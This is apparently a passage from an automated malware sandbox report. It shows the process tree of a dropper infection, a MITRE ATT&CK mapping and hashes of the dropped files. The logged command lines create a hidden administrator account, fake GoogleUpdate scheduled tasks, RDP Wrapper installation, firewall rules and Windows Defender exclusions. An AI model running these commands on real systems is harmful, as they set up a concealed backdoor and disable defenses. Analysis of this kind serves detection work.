        PID:1920
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
      4⤵
      System Location Discovery: System Language Discovery
      PID:2828
  - - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com
      Riscalda.exe.com Z
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2912
    - - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com
        
        C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com Z
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2740
      - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2144
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
      4⤵
      System Location Discovery: System Language Discovery
      PID:2832
  - - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com
      Desideri.exe.com G
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2688
    - - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com
        
        C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com G
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2092
      - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:2588
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\1172.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\979.vbs
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2312
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\1172.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\979.vbs
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1980
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\81.vbs" EGocAeBsIQ UceSTiIhIr "C:\Users\Admin\AppData\Roaming\ALKmVbB\531.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\FbUHLyhG.bat" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1164
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\81.vbs" EGocAeBsIQ UceSTiIhIr "C:\Users\Admin\AppData\Roaming\ALKmVbB\531.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\FbUHLyhG.bat" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2332
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineUA38"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1644
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineUA38"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1712
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\321.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\979.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
        7⤵
        
        PID:1944
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\321.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\979.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2476
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore48"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1280
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore48"
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1924
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\ALKmVbB\FuaxiqhamB.bat EGocAeBsIQ UceSTiIhIr"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1556
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2496
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1796
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1808
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2124
        
        C:\Windows\SysWOW64\net.exe
        
        net user EGocAeBsIQ UceSTiIhIr /add
        8⤵
        
        PID:2452
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user EGocAeBsIQ UceSTiIhIr /add
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1844
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup Administrators EGocAeBsIQ /add
        8⤵
        
        PID:2212
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators EGocAeBsIQ /add
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1012
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" EGocAeBsIQ /add
        8⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:1668
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" EGocAeBsIQ /add
        9⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:1520
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2088
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2492
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v EGocAeBsIQ /t REG_DWORD /d "00000000" /f
        8⤵
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        
        PID:2536
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1600
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
        8⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2548
        
        C:\Windows\SysWOW64\timeout.exe
        
        Timeout /t 15
        8⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2796
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"
        7⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2764
        
        C:\Windows\SysWOW64\fsutil.exe
        
        fsutil dirty query C:
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2232
        
        C:\Windows\SysWOW64\sc.exe
        
        sc queryex "TermService"
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2216
        
        C:\Windows\SysWOW64\find.exe
        
        find "STATE"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2436
        
        C:\Windows\SysWOW64\find.exe
        
        find /v "RUNNING"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3052
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3040
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:1752
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2424
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1480
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2876
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c query session rdp-tcp
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2732
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1280
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1748
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:1600
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        
        PID:2256
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2140
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:280
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:352
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1328
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2076
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "6.1.7601.17514" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1356
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"[6.1.7601.17514]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1312
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\112.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\795.vbs" "VlVoV1RWQlZWa2hpTWs1Q1dsVktlbE5XUlcxUk1GWk5aRlF4VmxreVZsUldSMnhLWVVWc2VVcHNRalZpUlhSSFVsZHpPV1Y2ClFYZFBWRWt3VGxSVmVFeFVRa1ZTVkVGMENrNUVWWGhOUXpGRFRVVkdSMHhVYXpWT1ZVMTRUMFZOZDFKcVRYcE5XREE5" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2480
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\112.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\795.vbs" "VlVoV1RWQlZWa2hpTWs1Q1dsVktlbE5XUlcxUk1GWk5aRlF4VmxreVZsUldSMnhLWVVWc2VVcHNRalZpUlhSSFVsZHpPV1Y2ClFYZFBWRWt3VGxSVmVFeFVRa1ZTVkVGMENrNUVWWGhOUXpGRFRVVkdSMHhVYXpWT1ZVMTRUMFZOZDFKcVRYcE5XREE5" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1020
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore26"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2132
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore26"
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2440
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 30
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
PID:2712

C:\Windows\system32\taskeng.exe
taskeng.exe {51878247-83E0-4A77-BC99-21F58D94B95F} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]
1⤵
PID:3028
- C:\Windows\System32\WScript.exe
  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\795.vbs" VlVoV1RWQlZWa2hpTWs1Q1dsVktlbE5XUlcxUk1GWk5aRlF4VmxreVZsUldSMnhLWVVWc2VVcHNRalZpUlhSSFVsZHpPV1Y2ClFYZFBWRWt3VGxSVmVFeFVRa1ZTVkVGMENrNUVWWGhOUXpGRFRVVkdSMHhVYXpWT1ZVMTRUMFZOZDFKcVRYcE5XREE5
  2⤵
  - Blocklisted process makes network request
  PID:1740
- C:\Windows\System32\WScript.exe
  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\531.vbs" EGocAeBsIQ UceSTiIhIr "C:\Users\Admin\AppData\Roaming\ALKmVbB\FbUHLyhG.bat"
  2⤵
  PID:3036
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\ALKmVbB\FbUHLyhG.bat
    3⤵
    - Drops file in System32 directory
    PID:2292
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
      4⤵
      PID:1096
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        5⤵
        
        PID:2460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
      4⤵
      PID:888
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        5⤵
        
        PID:2296
  - - C:\Windows\system32\net.exe
      net user EGocAeBsIQ UceSTiIhIr /add
      4⤵
      PID:2536
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user EGocAeBsIQ UceSTiIhIr /add
        5⤵
        
        PID:2492
  - - C:\Windows\system32\net.exe
      net localgroup Administrators EGocAeBsIQ /add
      4⤵
      PID:1280
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators EGocAeBsIQ /add
        5⤵
        
        PID:1580
  - - C:\Windows\system32\net.exe
      net localgroup Remote Desktop Users EGocAeBsIQ /add
      4⤵
      PID:580
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Remote Desktop Users EGocAeBsIQ /add
        5⤵
        
        PID:2172
  - - C:\Windows\system32\net.exe
      net accounts /maxpwage:unlimited
      4⤵
      PID:1028
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        5⤵
        
        PID:2612
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v EGocAeBsIQ /t REG_DWORD /d "00000000" /f
      4⤵
      Hide Artifacts: Hidden Users
      PID:2360
  - - C:\Windows\system32\reg.exe
      reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
      4⤵
      PID:2080
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:2920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:604
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:1360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:2176
  - - C:\Windows\system32\timeout.exe
      Timeout /t 15
      4⤵
      Delays execution with timeout.exe
      PID:2220

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Password Policy Discovery

T1201

Permission Groups Discovery

T1069

Local Groups

T1069.001

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\RDP Wrapper\rdpwrap.bat

Filesize
12KB

MD5
b365fde3be7855f4254d1e4bba45d260

SHA1
b56c6f0402b25c5d68e3a722144f5f4b5bb53d27

SHA256
2a175e17c98f9d5f436e23d1c9670f36e54cb82269bccddc87dcfbcfb04d1360

SHA512
d08e261c0f5c18041d005029cc6ed6119a8cc446607bb5f683a059d1a193d8e04d3e0b52c9f2ea871fcfa8e043c5c2886cfce5419eaf37c39003236f7a399026

Download Submit
C:\Program Files\RDP Wrapper\rdpwrap.ini

Filesize
115KB

MD5
3b18b58b5b9d32e1e8dc3d4f681227cd

SHA1
fd328b70f225a372903a3b36567779891f39dc32

SHA256
79173702b2b38b8f9ad86ca394f3e8921d01c1aa0c7cfb2f64a760e2f2726cdf

SHA512
ae15406e7e280ee448edfe35da0d5f84d392ebc5b33d730a9b240bdf3ec4f1a0b0e54c03af226cc3eca04ebffd9416a58d4a917dc537ffb0bd370f20417e10a4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
dc7cad1432e19f67280d036c8cfdeee2

SHA1
137e5ada9f251f035623181706a5392a5f0428be

SHA256
da7df464d0b2384703521f69305abeceaf2a27226ec5f2e4a1cfa60cf9522b0c

SHA512
ea9c413de40322e43e84c4827be693cf2e4f06afef2ff1c1ece7242323dfc799bc688afbd204cc73dfaab03767fc17c3cf6f5da412e33eeb511b9a4b8717013b

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabCA05.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarCA27.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\ALKmVbB\112.vbs

Filesize
2KB

MD5
e526da1842354849cfc018128001a6b4

SHA1
921f1ab5499eb550a351d4a394bd44df5d173ea5

SHA256
563dd781dd63543f7ee67747f044fbd77877cd46e34df7de1c96f287eeb39b14

SHA512
79b4f306f9d89af12441fb6df2221a0ff8b9124ff23fadca037ed2319eb6a989bc94595598c49b61ed2e8dc12015b68190e59b7658eeaf1825d8d37de2586865

Download Submit
C:\Users\Admin\AppData\Roaming\ALKmVbB\1172.vbs

Filesize
9KB

MD5
fdc134c640049724853a14b692623719

SHA1
500ff9c4e30c34e4ab0ac0ce7c32e5f9116020a5

SHA256
dc42333f20b3a524dc7d7a1c3301188d36642fb077758c2ab4d824a0439ecd00

SHA512
1b34d84d77cad63d69fcae45735c3616ff6bcac2176bfef1ce4e6d08f4bffa98a48aaa036b3f9674d516d923a353bc339290f7204436de9971e7b2ebf60f407f

Download Submit
C:\Users\Admin\AppData\Roaming\ALKmVbB\321.vbs

Filesize
2KB

MD5
d427d2ed9db86d08b38f5f8b5eec4493

SHA1
5cfe9f751bad99009abf1a642eec8f7c67870051

SHA256
